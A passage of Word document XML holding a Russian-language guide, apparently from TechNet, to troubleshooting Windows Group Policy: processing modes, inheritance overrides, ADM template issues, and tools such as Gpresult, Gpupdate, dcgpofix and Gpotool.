        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2462" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Обновление политики</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidTr="00A12BEF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2470" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId256" w:tgtFrame="_blank" w:tooltip="Посетите техцентр Windows Server 2000" w:history="1">
              <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
                <w:rPr>
                  <w:rStyle w:val="a8"/>
                  <w:color w:val="auto"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>Windows 2000</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1607" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Синхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Синхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2462" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Асинхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidTr="00A12BEF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2470" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId257" w:tgtFrame="_blank" w:tooltip="Посетите техцентр Windows XP" w:history="1">
              <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
                <w:rPr>
                  <w:rStyle w:val="a8"/>
                  <w:color w:val="auto"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>Windows XP</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Professional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1607" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Асинхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Асинхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2462" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Асинхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidTr="00A12BEF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2470" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId258" w:tgtFrame="_blank" w:tooltip="Посетите техцентр Windows Server 2003" w:history="1">
              <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
                <w:rPr>
                  <w:rStyle w:val="a8"/>
                  <w:color w:val="auto"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>Windows Server 2003</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1607" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Синхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Синхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2462" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A12BEF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Асинхронно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если нужно изменить данное поведение, можно модифицировать следующий параметр политики:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Configuration | Administrative Templates | </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">System | Logon | Always wait for the network at computer startup and logon </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Большинство администраторов предпочитают синхронное изменение политики для обеспечения применения всех политик до того, как пользователь получит доступ к рабочему столу. Таким образом обеспечивается применение всех параметров безопасности и настройки до того, как пользователь сможет выполнить какие-либо действия. Обратите внимание, что такое поведение по умолчанию отключено в Windows® </w:t>
      </w:r>
      <w:hyperlink r:id="rId259" w:tgtFrame="_blank" w:tooltip="Посетите техцентр Windows XP" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>XP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Professional в пользу оптимизации ускоренного входа в систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="S10"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменение наследования по умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Существует четыре разных способа изменения наследования по умолчанию для обработки объектов GPO. Эти мощные возможности следует использовать с осторожностью, поскольку они могут существенно изменить поведение обработки групповых политик. Они также очень трудны в отладке. Возможности изменения наследования по умолчанию включают следующие четыре параметра и настройки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Блокировать наследование политики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Принудительное выполнение объектов GPO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фильтрация объектов GPO по списку управления доступом (ACL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фильтры инструментария управления Windows (WMI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Поскольку эти параметры следует использовать с осторожностью, случаи их использования должно быть несложно записать. Выяснить, используются ли эти возможности, можно в консоли управления групповыми политиками GPMC. Блокирование наследования выполняется на уровне домена или подразделения в панели GPMC. Параметры принудительного выполнения объектов, фильтрации по спискам ACL, и фильтрация WMI задаются для каждого объекта GPO отдельно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Еще один способ – это запустить на конечном компьютере команду Gpresult, чтобы узнать, не препятствует ли какой-то из этих параметров применению политик. Для получения более подробной информации о применяемом наборе политик можно добавить к команде Gpresult параметр /v, включающий подробный вывод.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="S11"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проблемы с шаблонами ADM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настраивая параметры в объекте GPO в разделе Административные шаблоны, вы работаете с шаблонами ADM. Кроме шаблонов ADM, поставляемых с операционной системой, можно также создавать пользовательские шаблоны для использования в объектах GPO. Код в шаблоне ADM создает папки и политики в редакторе групповых политик в разделе Административные шаблоны. Однако в случае, если шаблон ADM поврежден, отсутствует или неправильно настроен, некоторые или все из настроек могут не отображаться в редакторе. Ниже приводятся некоторые из проблем, которых следует остерегаться при использовании шаблонов ADM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Отсутствующие шаблоны ADM Если при редактировании объекта GPO в пользовательском шаблоне ADM обнаруживаются параметры, которые не отображаются в редакторе, данный шаблон ADM необходимо импортировать в объект GPO. Это можно </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>сделать, щелкнув правой кнопкой мыши на узле Административные шаблоны в редакторе и выбрав Добавление и удаление шаблонов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Отсутствующие предпочтения Существует два типа параметров, которые можно создавать в пользовательском объекте GPO: предпочтения и политики. Политики являются параметрами по умолчанию, все они попадают в один из четырех подразделов в реестре, каждый из которых заканчивается текстом </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Policies</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Политики). Предпочтения – это изменения реестра </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>старого стиля</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые не попадают ни в один из четырех подразделов и которые трудно отменить после внесения. По умолчанию такие предпочтения не отображаются в редакторе. Их отображение нужно включить, что можно сделать, выбрав Вид в меню на панели инструментов. Далее нужно выбрать Фильтрация, затем установить флажок </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Показывать только управляемые параметры политики</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Это приведет к немедленному отображению предпочтений, настроенных в импортированном пользовательском шаблоне ADM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="S14"/>
      <w:bookmarkEnd w:id="129"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезные инструменты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Существует множество средств обнаружения проблем в области групповой политики. Некоторые из них встроены в операционную систему, другие можно загрузить и установить. Далее мы обсудим соответствующие средства, чтобы вы могли выбрать то, которое подходит для решения конкретной задачи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dcgpofix Иногда могут возникать проблемы с одним из двух стандартных объектов GPO: Используемый по умолчанию GPO домена и используемый по умолчанию GPO контроллеров домена . Если один или оба из них повреждены настолько серьезно, что их нельзя исправить, или же возникает другая неизвестная неполадка, с помощью средства dcgpofix их можно вернуть в состояние по умолчанию. Данное средство включено в Windows Server® 2003. Его не следует использовать на контроллере домена Windows 2000; вместо этого можно использовать инструмент Recreatedefpol. Необходимо помнить, что после использования этого средства будут потеряны все пользовательские настройки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recreatedefpol Данное средство работает аналогично Dcgpofix, но для серверов Windows 2000. С его помощью можно вернуть два упомянутых стандартных объекта GPO в их исходное состояние. Данный инструмент предназначен для восстановления после серьезного сбоя, его не следует использовать для текущего обслуживания объектов GPO.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Просмотр событий Средство просмотра событий может предоставить обширную информации о групповых политиках. К сожалению, для поиска записей о групповых политиках потребуется просмотреть все из различных файлов журналов. Там можно найти записи о применении, репликации и обновлении политик, что может помочь в обнаружении возникшей проблемы. В журналах событий иногда недостаточно информации о конкретных ошибках групповых политик, но следует помнить, что не поддающиеся идентификации ошибки всегда можно поискать в </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:tgtFrame="_blank" w:tooltip="Посетите Microsoft TechNet - неисчерпаемый источник информации для ИТ-специалистов" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>TechNet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gpresult Данное средство можно запускать только на целевом компьютере, зато оно выдает информацию о результирующем наборе политик (RSoP), заблокированных объектах GPO, разрешениях на GPO и многом другом. С параметром /v данная команда выведет подробную информацию об объектах GPO, действующих для данного компьютера, и учетных записях пользователей, связанных с текущим сеансом работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gpupdate Для реализации новых параметров GPO или проверки полноты обработки всех GPO можно использовать средство Gpupdate. Это утилита командной строки, поставляемая с операционной системой (Windows XP и последующие версии). Она вызывает фоновое обновление, которое применяет все параметры GPO, соответствующие данному типу обновления. С параметром /force она повторно применяет параметры GPO, даже если с момента последнего обновления не происходило никаких изменений объектов GPO. Выполнение данной команды перед выполнением команды Gpresult является очень мощным способом отслеживания неполадок объектов групповых политик.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gpotool Поскольку все объекты GPO реплицируются с контроллера домена, на котором в них были внесены изменения, на все другие контроллеры, существует вероятность сбоя репликации или неполадок при согласовании изменений. В результате может возникнуть несогласованность или сбой при применении изменений к конечным компьютерам. Утилиты Gpresult и RSOP помогают определить, какие из объектов GPO были применены, но данное </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">средство, Gpotool, помогает обнаружить несогласованность объектов GPO между контроллерами домена. Эта утилита входит в состав Windows Server 2003 Resource Kit по адресу </w:t>
      </w:r>
      <w:hyperlink r:id="rId261" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>go.microsoft.com/fwlink/?LinkId=77613</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (на английском языке).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
